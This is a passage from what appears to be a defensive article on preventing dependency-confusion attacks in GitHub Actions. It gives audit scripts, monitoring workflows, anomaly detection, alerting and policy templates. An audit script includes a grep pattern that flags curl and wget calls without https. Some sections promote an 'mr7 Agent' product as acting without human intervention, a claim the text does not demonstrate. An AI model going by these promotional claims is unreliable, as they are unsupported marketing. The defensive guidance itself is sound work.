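EXACT_VERSION = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$")


def floating_dependencies(package_json_text: str) -> Dict[str, str]:
    """Return dependencies whose specifier allows more than one version."""
    manifest = json.loads(package_json_text)
    floating: Dict[str, str] = {}
    for section in ("dependencies", "devDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if not EXACT_VERSION.match(spec):
                floating[name] = spec
    return floating


sample_manifest = json.dumps({
    "dependencies": {
        "express": "^4.18.0",
        "@company/private-api-client": "^2.1.0",
        "lodash": "4.17.21",
    }
})
floating = floating_dependencies(sample_manifest)
print(floating)
# {'express': '^4.18.0', '@company/private-api-client': '^2.1.0'}
```

A caret range on a private package is what allows a higher public version to satisfy the specifier, so these entries deserve the closest review.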

Regular security audits should verify that these controls remain effective:

```bash
#!/bin/bash
# Security audit script

check_workflow_security() {
  local workflow_dir="$1"

  echo "Scanning $workflow_dir for security issues..."

  # Check for missing registry specifications
  grep -r "npm install" "$workflow_dir" --include="*.yml" --include="*.yaml" |
    grep -v -e "--registry" && echo "WARNING: Found npm installs without registry specification"

  # Check for missing authentication
  grep -r "pip install" "$workflow_dir" |
    grep -v -e "--index-url" && echo "WARNING: Found pip installs without index specification"

  # Check for insecure network access
  grep -rE "curl|wget" "$workflow_dir" |
    grep -v "https://" && echo "WARNING: Found insecure HTTP requests"
}

# Run audit on all workflow directories
find . -name ".github" -type d | while read -r dir; do
  check_workflow_security "$dir/workflows"
done
```

Training and awareness programs ensure that developers understand these security requirements and implement them consistently across all projects.

Best Practice: Implement a zero-trust approach to dependency management by defaulting to private registries and explicitly blocking access to public registries for private package names.

Automated Detection and Response Systems

Building automated detection and response systems for GitHub Actions supply chain attacks requires integrating multiple security tools and establishing intelligent alerting mechanisms. These systems must balance sensitivity with specificity to avoid overwhelming security teams with false positives while ensuring that genuine threats are detected and responded to quickly.

The foundation of automated detection lies in comprehensive logging and monitoring of all workflow activities. Organizations should implement detailed telemetry collection that captures:

- All package installation events and their sources

- Network connections initiated during workflow execution

- Environment variable access and usage patterns

- File system modifications and artifact generation

- Credential usage and authentication attempts

Here's an example of implementing comprehensive monitoring in GitHub Actions:

```yaml
# Enhanced monitoring workflow
name: Security-Monitored Build
on: [push, pull_request]
jobs:
  monitored-build:
    runs-on: ubuntu-latest
    env:
      SECURITY_MONITORING_ENABLED: true
    steps:
      - uses: actions/checkout@v3

      - name: Setup Security Monitoring
        run: |
          # Install monitoring tools
          sudo apt-get update
          sudo apt-get install -y auditd sysstat tcpdump

          # Start system monitoring
          sudo systemctl start auditd

          # Configure network monitoring
          sudo tcpdump -i any -w /tmp/network.pcap &
          echo $! > /tmp/tcpdump.pid

      - name: Install Dependencies with Logging
        run: |
          # Wrap package managers with logging
          mkdir -p "$HOME/monitoring"
          export REAL_NPM="$(command -v npm)"
          cat > "$HOME/monitoring/npm" << 'EOF'
          #!/bin/bash
          LOG_FILE="/tmp/package-install.log"

          # Log the command
          echo "[$(date -Iseconds)] EXECUTING: npm $*" >> "$LOG_FILE"

          # Execute original command (REAL_NPM is exported by the calling step)
          "$REAL_NPM" "$@"
          EXIT_CODE=$?

          # Log result
          echo "[$(date -Iseconds)] RESULT: $EXIT_CODE" >> "$LOG_FILE"
          exit $EXIT_CODE
          EOF
          chmod +x "$HOME/monitoring/npm"

          # Put the wrapper ahead of the real npm for this step, then install
          export PATH="$HOME/monitoring:$PATH"
          npm ci

      - name: Security Analysis
        if: always()
        run: |
          # Analyze collected data
          echo "=== Package Installation Log ==="
          cat /tmp/package-install.log || true
          echo "=== Network Activity ==="
          sudo kill "$(cat /tmp/tcpdump.pid)" || true
          sudo chmod a+r /tmp/network.pcap
          sudo tcpdump -nr /tmp/network.pcap | head -20

      - name: Upload Security Artifacts
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: security-monitoring-data
          path: |
            /tmp/package-install.log
            /tmp/network.pcap
```

Machine learning-based anomaly detection can identify suspicious patterns that might indicate compromise:

```python
# Anomaly detection for workflow behavior
import pandas as pd
from sklearn.ensemble import IsolationForest

# Features extracted from each workflow run
FEATURES = [
    'package_count', 'external_requests', 'execution_time',
    'memory_usage', 'network_bytes_out'
]


class WorkflowAnomalyDetector:
    def __init__(self):
        self.model = IsolationForest(contamination=0.1, random_state=42)
        self.baseline_data = None

    def train_baseline(self, historical_data):
        """Train model on normal workflow behavior"""
        df = pd.DataFrame(historical_data)
        self.baseline_data = df[FEATURES]
        self.model.fit(self.baseline_data)

    def detect_anomalies(self, current_run):
        """Detect anomalies in current workflow execution"""
        # Use the same columns, in the same order, as the training data
        features_df = pd.DataFrame([current_run])[FEATURES]

        # Predict anomalies (-1 = anomaly, 1 = normal); lower scores are more anomalous
        anomaly_scores = self.model.decision_function(features_df)
        predictions = self.model.predict(features_df)
        score = float(anomaly_scores[0])

        return {
            'is_anomaly': bool(predictions[0] == -1),
            'anomaly_score': score,
            # Illustrative cut-offs; calibrate them against your own baseline
            'risk_level': 'HIGH' if score < -0.5 else 'MEDIUM' if score < -0.2 else 'LOW'
        }


# Usage example
def analyze_workflow_execution(log_data):
    detector = WorkflowAnomalyDetector()

    # Load baseline data (would come from historical runs).
    # load_historical_data, extract_features, and send_alert are
    # placeholders supplied by your own pipeline.
    baseline_runs = load_historical_data()
    detector.train_baseline(baseline_runs)

    # Analyze current run
    current_features = extract_features(log_data)
    result = detector.detect_anomalies(current_features)

    if result['is_anomaly']:
        send_alert(
            "Anomalous workflow behavior detected!",
            f"Risk Level: {result['risk_level']}",
            f"Anomaly Score: {result['anomaly_score']}"
        )

    return result
```

Real-time alerting systems should prioritize alerts based on risk levels and provide actionable information:

```python
# Alert management system
import json
import os
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart

from slack_sdk import WebClient


class SecurityAlertManager:
    def __init__(self):
        self.alert_thresholds = {
            'critical': {'score': 0.9, 'response_time': 'immediate'},
            'high': {'score': 0.7, 'response_time': '1_hour'},
            'medium': {'score': 0.5, 'response_time': '4_hours'},
            'low': {'score': 0.3, 'response_time': '24_hours'}
        }
        # Assumes the bot token is provided via the SLACK_BOT_TOKEN environment variable
        self.slack_client = WebClient(token=os.environ.get('SLACK_BOT_TOKEN'))

    def send_alert(self, alert_type, details, recipients):
        """Send security alert through multiple channels"""
        subject = f"SECURITY ALERT: {alert_type.upper()}"
        body = self.format_alert_body(alert_type, details)

        # Send email
        self.send_email_alert(subject, body, recipients)

        # Send Slack notification
        self.send_slack_alert(subject, body)

        # Log to SIEM
        self.log_to_siem(alert_type, details)

    def format_alert_body(self, alert_type, details):
        return f"""SECURITY INCIDENT ALERT

Type: {alert_type}
Timestamp: {details.get('timestamp', 'N/A')}
Repository: {details.get('repository', 'N/A')}
Workflow: {details.get('workflow', 'N/A')}
Risk Score: {details.get('risk_score', 'N/A')}

Details: {json.dumps(details.get('details', {}), indent=2)}

Recommended Actions:
- Review workflow execution logs
- Check for unauthorized package installations
- Rotate potentially compromised credentials
- Investigate network connections
"""

    def send_email_alert(self, subject, body, recipients):
        msg = MIMEMultipart()
        msg['Subject'] = subject
        msg['From'] = '[email protected]'
        msg['To'] = ', '.join(recipients)
        msg.attach(MIMEText(body, 'plain'))

        # Send via SMTP (implementation details omitted)
        pass

    def send_slack_alert(self, subject, body):
        # Send to security channel
        self.slack_client.chat_postMessage(
            channel='#security-alerts',
            text=f":rotating_light: {subject}\n{body[:500]}..."
        )

    def log_to_siem(self, alert_type, details):
        # Forward to the SIEM (implementation details omitted)
        pass


# Integration with workflow monitoring
def handle_workflow_event(event_data):
    alert_manager = SecurityAlertManager()

    # Analyze event for security issues
    # (assess_risk is a placeholder for your own scoring logic)
    risk_assessment = assess_risk(event_data)

    if risk_assessment['score'] > 0.7:
        alert_manager.send_alert(
            'dependency_confusion',
            {
                'timestamp': event_data['timestamp'],
                'repository': event_data['repository'],
                'workflow': event_data['workflow'],
                'risk_score': risk_assessment['score'],
                'details': risk_assessment['details']
            },
            ['[email protected]', '[email protected]']
        )
```

Automated response capabilities can help contain incidents quickly:

```yaml
# Automated incident response workflow
name: Incident Response
on:
  workflow_run:
    workflows: ["Security-Monitored Build"]
    types: [completed]

jobs:
  analyze-and-respond:
    runs-on: ubuntu-latest
    if: ${{ github.event.workflow_run.conclusion == 'failure' }}
    permissions:
      actions: read
      contents: write
    steps:
      # Checkout is required for the git push in the response step
      - uses: actions/checkout@v4

      - name: Download Artifacts
        uses: actions/github-script@v7
        with:
          script: |
            const artifacts = await github.rest.actions.listWorkflowRunArtifacts({
              owner: context.repo.owner,
              repo: context.repo.repo,
              run_id: context.payload.workflow_run.id
            });

            // Download security monitoring data
            // Analyze for signs of compromise

      - name: Automated Triage
        run: |
          # Run automated analysis
          python3 /opt/security/analyzer.py \
            --artifacts /tmp/artifacts \
            --report /tmp/analysis-report.json

          # Determine response actions
          python3 /opt/security/responder.py \
            --report /tmp/analysis-report.json \
            --actions quarantine,notify,rollback

      # Runs only when an earlier step (such as triage) exits non-zero
      - name: Execute Response Actions
        if: failure()
        run: |
          # Quarantine affected branches
          git push origin :refs/heads/suspicious-branch

          # Notify security team
          curl -X POST "https://slack.company.com/webhook" \
            -H "Content-Type: application/json" \
            -d '{"text": "Potential supply chain attack detected in ${{ github.repository }}"}'
```

Integration with security orchestration platforms enables coordinated response across multiple systems:

```python
# Security orchestration integration
import requests
from datetime import datetime, timezone


class SOARIntegration:
    def __init__(self, soar_url, api_key):
        self.soar_url = soar_url
        self.headers = {'Authorization': f'Bearer {api_key}'}

    def create_incident(self, title, description, severity='medium'):
        """Create incident in SOAR platform"""
        incident_data = {
            'title': title,
            'description': description,
            'severity': severity,
            'category': 'supply_chain_attack',
            'detected_at': datetime.now(timezone.utc).isoformat(),
            'status': 'new'
        }

        response = requests.post(
            f'{self.soar_url}/api/incidents',
            headers=self.headers,
            json=incident_data,
            timeout=10
        )
        return response.json() if response.status_code == 201 else None

    def add_evidence(self, incident_id, evidence_data):
        """Add evidence to existing incident"""
        evidence_payload = {
            'incident_id': incident_id,
            'type': 'workflow_artifact',
            'data': evidence_data,
            'timestamp': datetime.now(timezone.utc).isoformat()
        }
        requests.post(
            f'{self.soar_url}/api/evidence',
            headers=self.headers,
            json=evidence_payload,
            timeout=10
        )


# Usage in automated response
# (repository_name and package_log_content come from the triggering workflow run)
soar = SOARIntegration('https://soar.company.com', 'api-key-here')

incident = soar.create_incident(
    title='Potential Dependency Confusion Attack',
    description=f'Detected in repository {repository_name}',
    severity='high'
)

if incident:
    soar.add_evidence(incident['id'], {
        'artifact_type': 'package_install_log',
        'content': package_log_content,
        'source': 'github_actions'
    })
```

These automated systems significantly reduce response times and help security teams focus on high-priority threats rather than routine monitoring tasks.
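To keep teams focused on high-priority threats, a risk score has to be turned into a severity and a response deadline somewhere in the pipeline. The sketch below shows one possible mapping that reuses the threshold values from the `alert_thresholds` table in `SecurityAlertManager`; the `classify_alert` function itself is an illustrative assumption rather than part of that class.

```python
from typing import Optional

# Thresholds mirror the alert_thresholds table in SecurityAlertManager,
# ordered from most to least severe so the first match wins.
ALERT_THRESHOLDS = [
    ("critical", 0.9, "immediate"),
    ("high", 0.7, "1_hour"),
    ("medium", 0.5, "4_hours"),
    ("low", 0.3, "24_hours"),
]


def classify_alert(score: float) -> Optional[tuple[str, str]]:
    """Return (severity, response_time) for a risk score, or None if below all thresholds."""
    for severity, minimum, response_time in ALERT_THRESHOLDS:
        if score >= minimum:
            return severity, response_time
    return None


if __name__ == "__main__":
    for score in (0.95, 0.72, 0.1):
        print(score, classify_alert(score))
```

Scores below the lowest threshold return `None`, which lets the caller log the event without paging anyone.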

Automation Advantage: Tools like mr7 Agent can automate the entire detection and response cycle, continuously monitoring GitHub Actions workflows and taking corrective actions without human intervention.

Best Practices for Supply Chain Security

Establishing robust supply chain security for GitHub Actions requires implementing comprehensive best practices that span technical controls, organizational processes, and cultural changes. These practices should be integrated into the software development lifecycle to create a defense-in-depth approach that protects against various attack vectors.

First and foremost, organizations must establish clear governance frameworks for dependency management. This includes creating formal policies that define acceptable sources for packages, approval processes for new dependencies, and regular review cycles for existing dependencies:

```markdown
# Dependency Management Policy

## Approved Sources

- Private registries (npm.company.com, pypi.company.com)
- Official public registries (npmjs.com, pypi.org) with verification
- Vetted third-party registries with security reviews

## Prohibited Practices

- Direct installation from git repositories
- Use of packages without integrity verification
- Installation from untrusted or unknown sources
- Bypassing security scanning tools

## Approval Process

- Security review for new dependencies
- Architecture committee approval for core dependencies
- Regular reassessment every 6 months
- Immediate removal of deprecated or vulnerable packages
```
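Parts of a policy like this can be checked mechanically. As a rough sketch, the function below scans the text of a `requirements.txt` file for two of the prohibited practices: direct installation from git repositories and entries without an integrity hash. The function name and the wording of the findings are illustrative assumptions, and the parsing is deliberately simplified.

```python
import re


def check_requirements(text: str) -> list[str]:
    """Flag requirement entries that break the policy's prohibited practices."""
    # Join backslash-continued lines so each requirement is one logical line.
    logical_lines = re.sub(r"\\\s*\n", " ", text).splitlines()
    findings = []
    for line in logical_lines:
        line = line.strip()
        if not line or line.startswith(("#", "-")):
            continue  # skip comments and option lines such as --index-url
        entry = line.split()[0]
        if "git+" in line:
            findings.append(f"{entry}: direct installation from a git repository")
        elif "--hash=" not in line:
            findings.append(f"{entry}: no integrity hash")
    return findings


if __name__ == "__main__":
    sample = (
        "requests==2.31.0 \\\n"
        "    --hash=sha256:abc\n"
        "flask==3.0.0\n"
        "git+https://github.com/org/repo.git#egg=tool\n"
    )
    for finding in check_requirements(sample):
        print(finding)
```

A check like this suits a pre-merge step, where a non-empty findings list blocks the pull request until the dependency is pinned with hashes or moved to an approved source.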

Technical implementation of these policies requires configuring build environments with strict controls:

```yaml
# Enterprise-grade secure workflow template
name: Enterprise Secure Build
on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]

env:
  NODE_AUTH_TOKEN: ${{ secrets.COMPANY_NPM_TOKEN }}
  PYTHON_INDEX_URL: https://pypi.company.com/simple/

jobs:
  security-build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      security-events: write

    steps:
      - name: Harden Runner
        uses: step-security/harden-runner@v2
        with:
          egress-policy: audit

      - uses: actions/checkout@v4
        with:
          persist-credentials: false

      # CodeQL must be initialized before the analyze step can run
      - name: Initialize CodeQL
        uses: github/codeql-action/init@v3
        with:
          languages: javascript

      - name: Setup Node.js Securely
        uses: actions/setup-node@v4
        with:
          node-version-file: '.nvmrc'
          registry-url: https://npm.company.com/
          always-auth: true

      - name: Configure npm Security
        run: |
          # Disable fallback to public registries for private scopes
          echo "@company:registry=https://npm.company.com/" >> .npmrc
          # Enable strict SSL verification
          npm config set strict-ssl true
          # Disable optional dependencies
          npm config set optional false

      - name: Setup Python Securely
        uses: actions/setup-python@v5
        with:
          python-version-file: '.python-version'

      - name: Configure Python Security
        run: |
          # Set private index as primary source
          pip config set global.index-url "$PYTHON_INDEX_URL"
          # Enable hash checking mode
          pip config set install.require-hashes true
          # Disable cache to prevent poisoning
          pip config set global.no-cache-dir true

      - name: Dependency Verification
        run: |
          # Verify lock file integrity
          npm ci --prefer-offline --no-audit
          # Check for known vulnerabilities
          npx audit-ci --high
          # Verify package signatures and fail the build if verification fails
          npm audit signatures || { echo "Signature verification failed"; exit 1; }

      - name: Security Scanning
        uses: github/codeql-action/analyze@v3
        with:
          category: "/language:javascript"

      - name: Upload Security Results
        uses: github/codeql-action/upload-sarif@v3
        if: success() || failure()
```

Organizations should also implement comprehensive dependency tracking and inventory management:

```bash
#!/bin/bash
# Dependency inventory and tracking script
set -euo pipefail

track_dependencies() {
  local repo_name="$1"
  local commit_hash="$2"

  echo "Tracking dependencies for $repo_name@$commit_hash"

  # Start from empty lists so a missing manifest does not break the upload
  : > deps-js.txt
  : > deps-python.txt

  # Extract JavaScript dependencies
  if [[ -f "package.json" ]]; then
    jq -r '(.dependencies // {}), (.devDependencies // {}) | to_entries[] | "\(.key)@\(.value)"' \
      package.json > deps-js.txt
  fi

  # Extract Python dependencies
  if [[ -f "requirements.txt" ]]; then
    cp requirements.txt deps-python.txt
  fi

  # Store in central inventory
  curl -X POST "https://inventory.company.com/api/dependencies" \
    -H "Content-Type: application/json" \
    -d @- <<EOF
{
  "repository": "$repo_name",
  "commit": "$commit_hash",
  "timestamp": "$(date -u +%Y-%m-%dT%H:%M:%SZ)",
  "dependencies": {
    "javascript": $(jq -R -s 'split("\n")[:-1]' deps-js.txt),
    "python": $(jq -R -s 'split("\n")[:-1]' deps-python.txt)
  }
}
EOF
}

# Integrate with GitHub Actions
if [[ -n "${GITHUB_REPOSITORY:-}" ]]; then
  track_dependencies "$GITHUB_REPOSITORY" "${GITHUB_SHA:-HEAD}"
fi
```

Regular security assessments and penetration testing should include specific evaluations of supply chain defenses:

```python
# Supply chain security assessment framework
import json
import os
from datetime import datetime, timezone
from typing import Dict


class SupplyChainAssessor:
    def __init__(self, repository_path: str):
        self.repo_path = repository_path
        self.results = {}

    def assess_registry_configuration(self) -> Dict:
        """Check if private registries are properly configured"""
        findings = []
        score = 100

        # Check for .npmrc configuration
        npmrc_path = f"{self.repo_path}/.npmrc"
        if not os.path.exists(npmrc_path):
            findings.append("Missing .npmrc configuration file")
            score -= 20
        else:
            with open(npmrc_path, 'r') as f:
                content = f.read()
            if "registry=" not in content:
                findings.append("No registry configuration in .npmrc")
                score -= 15

        return {
            'score': max(0, score),
            'findings': findings,
            'remediation': 'Configure private registries in .npmrc'
        }

    def assess_dependency_verification(self) -> Dict:
        """Check dependency verification mechanisms"""
        findings = []
        score = 100

        # Check for package-lock.json or yarn.lock
        lock_files = ['package-lock.json', 'yarn.lock', 'pnpm-lock.yaml']
        has_lock_file = any(
            os.path.exists(f"{self.repo_path}/{lf}") for lf in lock_files
        )
        if not has_lock_file:
            findings.append("No lock file found for dependency pinning")
            score -= 25

        # Check for integrity verification in workflows
        workflow_dir = f"{self.repo_path}/.github/workflows"
        if os.path.exists(workflow_dir):
            has_verification = False
            for wf in os.listdir(workflow_dir):
                if wf.endswith(('.yml', '.yaml')):
                    with open(f"{workflow_dir}/{wf}", 'r') as f:
                        content = f.read()
                    if 'npm audit' in content or 'audit-ci' in content:
                        has_verification = True
                        break
            if not has_verification:
                findings.append("No dependency verification in workflows")
                score -= 20

        return {
            'score': max(0, score),
            'findings': findings,
            'remediation': 'Implement dependency pinning and verification'
        }

    def generate_report(self) -> Dict:
        """Generate comprehensive security assessment report"""
        self.results = {
            'timestamp': datetime.now(timezone.utc).isoformat(),
            'repository': self.repo_path,
            'assessments': {
                'registry_configuration': self.assess_registry_configuration(),
                'dependency_verification': self.assess_dependency_verification(),
                # Additional assessments...
            }
        }

        # Calculate overall score
        scores = [
            assessment['score']
            for assessment in self.results['assessments'].values()
        ]
        self.results['overall_score'] = sum(scores) // len(scores)
        return self.results


# Usage example
assessor = SupplyChainAssessor('/path/to/repository')
report = assessor.generate_report()
print(json.dumps(report, indent=2))
```

Training and awareness programs ensure that developers understand and follow security best practices:

```markdown
# Supply Chain Security Training Curriculum

## Module 1: Understanding Supply Chain Risks

- Types of supply chain attacks
- Impact of compromised dependencies
- Real-world case studies

## Module 2: Secure Dependency Management

- Private registry configuration
- Dependency verification techniques
- Risk assessment for new packages

## Module 3: GitHub Actions Security

- Workflow security best practices
- Secret management
- Runner security considerations

## Module 4: Incident Response

- Recognizing signs of compromise
- Containment procedures
- Reporting and escalation
```

Continuous improvement processes ensure that security practices evolve with emerging threats:

```yaml
# Continuous security improvement workflow
name: Security Practice Review
on:
  schedule:
    - cron: '0 2 * * 1'  # Weekly on Mondays
  workflow_dispatch:      # Manual trigger

jobs:
  review-practices:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      issues: write
    steps:
      # Checkout is required so that .github/workflows is available for analysis
      - uses: actions/checkout@v4

      - name: Fetch Latest Threat Intelligence
        run: |
          curl -s https://raw.githubusercontent.com/github/advisory-database/main/advisories/github-actions/threats.json \
            -o /tmp/threat-intel.json

      - name: Analyze Current Practices
        run: |
          # Compare current workflows against latest threats
          python3 /opt/security/practice-analyzer.py \
            --workflows .github/workflows \
            --threats /tmp/threat-intel.json \
            --report /tmp/comparison-report.json

      - name: Generate Recommendations
        run: |
          # Generate actionable recommendations
          python3 /opt/security/recommender.py \
            --report /tmp/comparison-report.json \
            --template /opt/templates/improvement-template.md \
            --output /tmp/recommendations.md

      - name: Create Improvement Issues
        uses: peter-evans/create-issue-from-file@v4
        with:
          title: Supply Chain Security Improvement Recommendations
          content-filepath: /tmp/recommendations.md
          labels: security, improvement
```

By implementing these comprehensive best practices, organizations can significantly reduce their exposure to GitHub Actions supply chain attacks while maintaining efficient development processes.

Strategic Recommendation: Regular security assessments and continuous education programs are essential for maintaining strong supply chain defenses as threat landscapes evolve rapidly.

Key Takeaways

• Dependency confusion attacks exploit automatic fallback mechanisms in package managers, making proper registry configuration critical for preventing unauthorized package installations in GitHub Actions workflows.

• Proactive reconnaissance and monitoring are essential for identifying vulnerable workflows before attackers can exploit them, requiring both static analysis of workflow configurations and dynamic monitoring of actual executions.

• Strict authentication and explicit registry prioritization serve as the foundational defense mechanism, ensuring that private packages are never resolved from public registries where malicious alternatives might exist.

• Comprehensive logging and anomaly detection systems enable rapid identification of suspicious activities, allowing organizations to respond quickly to potential supply chain compromises before they cause significant damage.

• Automated security controls and policy enforcement reduce human error and ensure consistent application of security measures across all GitHub Actions workflows, from simple build processes to complex deployment pipelines.

• Regular security assessments and continuous improvement processes help organizations stay ahead of evolving threats by adapting their defenses based on the latest threat intelligence and attack techniques.

• Integrated incident response capabilities minimize the impact of successful attacks by enabling rapid containment, investigation, and remediation of supply chain compromises when they occur.

Frequently Asked Questions

Q: How can I quickly identify if my GitHub Actions workflows are vulnerable to dependency confusion attacks?

Start by auditing every workflow file for package installation commands that do not pin an explicit registry. Look for npm installs with neither a --registry flag nor a scoped registry entry in .npmrc, pip installs without --index-url, any use of --extra-index-url (which lets pip consider candidates from the public index alongside the private one), and any package manager invoked without authentication. Use automated scanning tools to check all repositories systematically, and monitor recent workflow runs for unexpected package downloads or network connections to unfamiliar domains.
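A first pass of that audit can be scripted. The sketch below is a simple heuristic, not a full workflow parser: it flags lines that call `npm install`, `npm ci`, or `pip install` without an explicit `--registry` or `--index-url` flag. The function name and patterns are illustrative assumptions, and a flagged line may still be safe if the registry is configured in `.npmrc` or `pip.conf`, so treat the output as a list of places to review.

```python
import re

# Tool name -> (pattern for an install command, flag that pins the registry).
INSTALL_PATTERNS = {
    "npm": (re.compile(r"\bnpm (?:install|i|ci)\b"), "--registry"),
    "pip": (re.compile(r"\bpip3? install\b"), "--index-url"),
}


def find_unpinned_installs(workflow_text: str) -> list[tuple[int, str]]:
    """Return (line number, line) pairs for install commands without a registry flag."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("#"):
            continue  # ignore commented-out commands
        for pattern, flag in INSTALL_PATTERNS.values():
            if pattern.search(stripped) and flag not in stripped:
                findings.append((lineno, stripped))
    return findings


if __name__ == "__main__":
    sample = (
        "steps:\n"
        "  - run: npm install\n"
        "  - run: npm ci --registry https://npm.company.com/\n"
        "  - run: pip install --extra-index-url https://pypi.company.com/simple/ internal-lib\n"
    )
    for lineno, line in find_unpinned_installs(sample):
        print(f"line {lineno}: {line}")
```

Because `--extra-index-url` does not contain the string `--index-url`, pip commands that only add an extra index are flagged as well, which matches the risk described above.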

Q: What's the most effective way to prevent attackers from registering malicious packages with my private package names?

Register your private package names in public registries before attackers can claim them, even if you don't plan to use them publicly. This defensive registration (sometimes loosely called "name squatting") prevents others from publishing under identical names. Where the registry supports it, publish internal packages under an organization-owned scope such as @company/, since only the scope owner can publish there. Additionally, avoid naming conventions that make internal package names easy to guess, and regularly monitor public registries for suspicious registrations that mimic your naming patterns.
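Monitoring can start with a periodic check of whether any internal name already exists on the public registry. The sketch below queries the public npm registry's package metadata endpoint, which returns 404 for names that do not exist. The function names and the example package names are illustrative assumptions, and the lookup is injectable so the logic can be exercised without network access.

```python
import urllib.error
import urllib.request
from typing import Callable, Iterable


def npm_name_is_public(name: str) -> bool:
    """Return True if the public npm registry serves metadata for this name."""
    # Scoped names such as @company/pkg need the slash URL-encoded.
    url = f"https://registry.npmjs.org/{name.replace('/', '%2F')}"
    try:
        with urllib.request.urlopen(url, timeout=10) as response:
            return response.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise


def find_exposed_names(
    internal_names: Iterable[str],
    exists: Callable[[str], bool] = npm_name_is_public,
) -> list[str]:
    """Return the internal names that also exist on the public registry."""
    return [name for name in internal_names if exists(name)]


if __name__ == "__main__":
    # Hypothetical internal package names; replace with your own inventory.
    for name in find_exposed_names(["company-auth-lib", "company-billing"]):
        print("Exists publicly, verify ownership:", name)
```

A hit is not necessarily an attack, since it may be your own placeholder package, but any public package you do not own under an internal name deserves immediate investigation.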

Q: Can I use mr7 Agent to automatically detect and prevent these supply chain attacks?

Yes, mr7 Agent can automate the detection and prevention of GitHub Actions supply chain attacks by continuously monitoring workflow executions, analyzing package installations, and enforcing security policies. It can automatically flag suspicious activities, quarantine potentially compromised builds, and even roll back changes when malicious dependencies are detected, significantly reducing response times and manual effort required for security operations.

Q: What should I do if I discover a malicious package has been installed in my GitHub Actions workflow?

Immediately rotate all secrets and credentials that might have been exposed during the compromised workflow execution. Quarantine the affected branch or tag to prevent further propagation, investigate the full scope of the compromise by reviewing all related workflow runs, and notify relevant stakeholders including security teams and potentially affected customers. Conduct a thorough forensic analysis to understand the attack vector and implement additional controls to prevent recurrence.

Q: How often should I review and update my GitHub Actions security configurations?

Review security configurations monthly as part of regular maintenance cycles, and immediately after any security incidents or when new threat intelligence becomes available. Implement automated scanning that runs continuously to catch configuration drift, and conduct comprehensive security assessments quarterly to ensure your defenses remain effective against evolving attack techniques and new vulnerability disclosures.
